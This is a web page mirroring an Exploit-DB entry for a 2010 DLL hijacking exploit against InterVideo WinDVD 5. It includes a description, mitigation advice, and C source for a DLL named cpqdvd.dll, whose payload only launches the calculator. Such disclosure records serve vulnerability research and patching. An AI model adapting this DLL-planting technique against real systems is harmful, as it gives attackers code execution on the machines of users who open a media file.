header-logo
Suggest Exploit
vendor:
WinDVD 5
by:
Beenu Arora
7,5
CVSS
HIGH
DLL Hijacking
427
CWE
Product Name: WinDVD 5
Affected Version From: WinDVD 5
Affected Version To: WinDVD 5
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2010

InterVideo WinDVD 5 DLL Hijacking Exploit

An attacker can exploit this vulnerability by creating a malicious DLL file and renaming it to cpqdvd.dll. The attacker can then create a file with the .ifo or .mpg extension in the same directory as the malicious DLL file. When the user opens the file, the malicious DLL file will be executed.

Mitigation:

Ensure that all software is up to date and patched with the latest security updates. Also, ensure that all users are aware of the risks of DLL hijacking and are trained to identify and avoid suspicious files.
Source

Exploit-DB raw data:

/*
# Greetz to :b0nd, Fbih2s,r45c4l,Charles ,j4ckh4x0r, punter,eberly, Charles, Dinesh Arora , Ganesha
# Site : www.BeenuArora.com

Exploit Title: InterVideo WinDVD 5 DLL Hijacking Exploit
Date: 25/08/2010
Author: Beenu Arora
Tested on: Windows XP SP3 , WinDVD 5
Vulnerable extensions: .ifo , .mpg

Compile and rename to cpqdvd.dll, create a file in the same dir with one of
the following extensions:
.ifo , .mpg
*/

#include <windows.h>
#define DLLIMPORT __declspec (dllexport)

DLLIMPORT void hook_startup() { evil(); }

int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}